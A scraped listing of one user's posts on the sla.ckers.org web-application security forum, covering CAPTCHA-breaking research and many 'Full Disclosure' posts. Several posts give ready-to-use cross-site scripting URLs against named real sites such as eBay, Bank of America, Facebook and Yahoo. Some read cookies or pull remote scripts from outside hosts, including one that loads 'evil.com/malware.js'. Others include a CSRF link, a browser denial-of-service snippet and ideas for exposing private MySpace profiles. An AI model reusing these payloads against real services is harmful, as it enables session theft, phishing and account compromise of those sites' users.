Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to stop spam, detect robotic activity, and actually harm the spam trade, as well as how it works, how to circumvent filters, etc. 

Pages: 12345...LastNext
Current Page: 1 of 26
Results 1 - 30 of 756
5 years ago
maluc
Finally got around to fixing. Simply requires the old password.. as I am too lazy to build in a nonce framework. -maluc
Forum: Bugs
5 years ago
maluc
Finally got around to fixing. The salted hash is different per person but static across your sessions. -maluc
Forum: Bugs
6 years ago
maluc
In it's current state, i'm pretty confident i can write a captcha solver for it, atleast on low. (high looks like a nightmare, lol) when you get any kinks out of it to a point i can take a fair swing at it - let me know .. i'd love to try ^^ For those testing Codetcha, i should point out that it's seemingly developed using firefox.. you'll get some buggy behavior in IE7, so use FF. -maluc
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
I like the idea, although it does have the side effect of limiting your audience to those capable of answering it - a bit elitist and un-beginner-friendly. (but that may be what that site wants) The only tricky part i see, is making a question base that's big enough and unique enough so an attacker can't just archive all permutations. Another huge boost to complexity would be to make the cod
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
Heh, I agree 99+% is more hopeful than realistic.. but anything above 50% is really pretty brutal, so i'd be satisfied with that. Breaking audio captchas seems to be a pretty overlooked vector in captcha solving - likely because noone seems to wanna learn audio signal processing anymore :T .. My sound parsing experience had been limited to DTMF (touch-tone sounds), so it's somewhat new for me
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
Well I started using them to train a neural network on an audio CAPTCHA (not one listed above), but I haven't had the time to get it fully working. The audio CAPTCHA i picked to start with has very little noise and amplitude adjustments, so the NN should identify it easily. The tricky part is in segmenting wave files when they have varying speed and the letters are not evenly paced. :T Once I g
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
And for those interested, these were my initial notes on the properties of each CAPTCHA. Might save someone a bit of time. Spammy: CAPTCHA notes gmail: link to view: https://www.google.com/accounts/NewAccount?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-10ba05aeaa8e9b701e5151437f9a44d3-64aeae753cc34f1c864f7edc97a046ccdc96987b&type=2 length: 5-8 range: a-z c
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
When it comes time to test and tweak an algorithm, or just to figure out where it's best to begin, it's helpful to have a large sample size to work with. Below are several php scripts I used to extract out and save 1000 CAPTCHA jpegs or wavs from the major email sites. They work very similar, but each one has subtle changes in parsing. The URL at the top of each file may need updating when you
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
The topic title is descriptive enough.. http://www.hi5.com/friend/account/editAccountLocale.do?defaultLanguage=th changes their language to Thai if they're logged in. http://www.hi5.com/friend/account/editAccountLocale.do?defaultLanguage=en back to english -maluc
Forum: CSRF and Session Info
6 years ago
maluc
hiya Ronald, research wasn't paying the bills.. so i had to limit it alot for a while :T it's good to be back though, missed this place. i'll try to keep contributing ^^ Must be logged in: http://www.crunchyroll.com/inbox?q=asdf%3Cbody%20onload%3D%22alert('XSS')%22%3Eqwer -maluc
Forum: Full Disclosure
6 years ago
maluc
http://pages.ebay.com/help/tp/items-authentication.html?fromFeature=%3Cbody%20onload%3Deval(%22ale%22%2B%22rt(docu%22%2B%22ment.cookie)%22)%3E I believe ebay employs a blacklist on keywords like 'document.cookie' and 'script' and 'alert(' -maluc
Forum: Full Disclosure
6 years ago
maluc
I don't know that this has also been live a full year while undisclosed - but atleast 7 months. https://epreferences.bankofamerica.com/asbs/servlet/SS?F=1410408&X=40058617572&T=40058617572&Z=asdf%22%3E%3Czz%20name%3D'zz'%20id%3D'0'%3E%3C/zz%3E%3Cscript%3Ex%3Ddocument.getElementsByName%28%27zz%27%29%5B0%5D;if(x.id%3D%3D0)%7Balert%28%271%20Phish%27%29;x.id%3D1;%7Delse%20if(x.id%3D%3D1
Forum: Full Disclosure
6 years ago
maluc
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://secure.facebook.com/add_poll.php&price_per_response=50&max_responses=200&cc_name=john+smith&cc_cardType=86&cc_creditCardNumber=4123412312341234&cc_expMonth=1&cc_expYear=2009&cc_countryCode=US&cc_street=qwer%22%3E%3Cscript%20src%3D%22http://ha.ckers.org/s.js%22%3E%3C/script%20vvvvv%3Ee&cc
Forum: Full Disclosure
6 years ago
maluc
http://www.bankofamerica.com/state.cgi?section=contact&update=yes&cookiecheck=yes&lob=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20k This has been live and undisclosed for atleast over a year that i've had it saved.. still works ^^ I no longer have a BoA account to use it further, however. -maluc
Forum: Full Disclosure
6 years ago
maluc
http://dev.mysql.com/get/anyQueryString/from/http://asdf.com/ anyQueryString is modifiable, as is asdf.com/ -maluc
Forum: Full Disclosure
6 years ago
maluc
a fun exercise in why partial censoring can be dangerous.. spacing comparison can likely uncover more, but i haven't the patience for that ^^ New Image: -maluc
Forum: Full Disclosure
6 years ago
maluc
my uni https://cs7000a.uta.edu/logon?--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!--a -maluc
Forum: Full Disclosure
6 years ago
maluc
This site is well guarded against XSS in every form and parameter.. but they didn't make sure to filter arbitrary parameter names http://my.convio.com/?elqPURLPage=7&notaparameter=--%3E%3C/script%20v=b%3E%3Cscript%20src=%22http://ha.ckers.org/s%22%3E -maluc
Forum: Full Disclosure
6 years ago
maluc
very much the same as mailto tags.. but less cpu intensive. It only peaks my cpu around 50% so it's still plenty useable, and ending the iexplore process will stop the spawning. Each instance uses 3-4mb of memory on my system. The only more annoying thing over mailto: tags is that windows won't group these in the taskbar - so it's a pain to close them all afterwards. <html> <head>
Forum: DoS
7 years ago
maluc
These are ones i had saved a while back (ironically enough, in my yahoo email account), for obvious reasons .. gaining access to a victims email account is generally more useful than any one website they frequent. Anyway, with the ease to find yahoo XSS holes and the fact that i have no time for my webappsec research - i'll just disclose em: Disclaimer- i have a couple thousand unread slackers po
Forum: Full Disclosure
7 years ago
maluc
lol.. well it'd take a while for the trial and all.. so u'd know if i got locked ups _-_ (unless all those unpaid speeding tickets now in warrant status finally catch up to me) anyway, i'm leaving for DC in about 8 hours.. and will be in virginia for a week. so i guess i wont catch up over spring break as i thought i would .-. anyone in either of those two states (DC = maryland far as im con
Forum: Intro
7 years ago
maluc
thought i'd reintroduce myself if anyone forgot who i was by now (and to the many new faces) i'm maluc, and i'll be a lurker for a while longer .. perhaps until as long as may :T webappsec is still my passion, but life has a habit of getting in the way .-. i'm still tinkering behind the scenes a bit, one day i'll have the time to write it all up - although i'm happy to see a couple of the t
Forum: Intro
7 years ago
maluc
that's because it's modifying the document before it's fully loaded.. use <script defer> instead. <script defer>e=document.createElement('div');e.setAttribute('id','test');document.body.appendChild(e);</script> defer prevents the javascript from executing until the page has fully loaded. Alternatively, you can set a body onload event to trigger the rest of your code. It's e
Forum: XSS Info
7 years ago
maluc
lol at 2600.. although it probably doesn't have much practical use, it's still amusing to see. -maluc
Forum: Full Disclosure
7 years ago
maluc
i'd suggest coding it in both IE and firefox one line at a time then - and checking fuctionality. trying to get it working fully in one first then porting, will give you white hairs .. there's just too many nuances to keep track of. There's really not too many differences in their javascript engines though .. aside from defining XHR objects, the way they handle 'defer' and extra functions/attri
Forum: Full Disclosure
7 years ago
maluc
well the only blogspot i goto, http://jeremiahgrossman.blogspot.com isnt affected .. so i wonder if it's a bug in the particular theme kuza uses? either way, it's a nice find. i don't have a blog there so i can't check whether it's able to access it's authentication cookies or not. anyway, very good find. -maluc
Forum: Full Disclosure
7 years ago
maluc
The Anti-Privacy addition.. that makes all private myspaces as public viewable. perhaps also needing to change the ages of people under 14 to 99 due to the online predator protections. (Or alternatively, making all public profiles private) If they stay public for a couple days, google will cache them and that snapshot will be viewable indefinitely i believe - or atleast much longer. Addition
Forum: Full Disclosure
7 years ago
maluc
perhaps wormtra.ckers.org .-. assuming it were hosted here -maluc
Forum: Projects
7 years ago
maluc
spam is evil.. and not the sexy Dr. Evil kind of evil.. the bad google kind -_- -maluc
Forum: Projects
7 years ago
maluc
try tab %09 or carraige return %0D or line feed %0A .. in place of the spaces if that doesn't work you can try just not using any spaces.. like: <script>x=document.createElement('script');x.src="evil.com/malware.js";document.body.appendChild(x)</script> -maluc
Forum: XSS Info
Pages: 12345...LastNext
Current Page: 1 of 26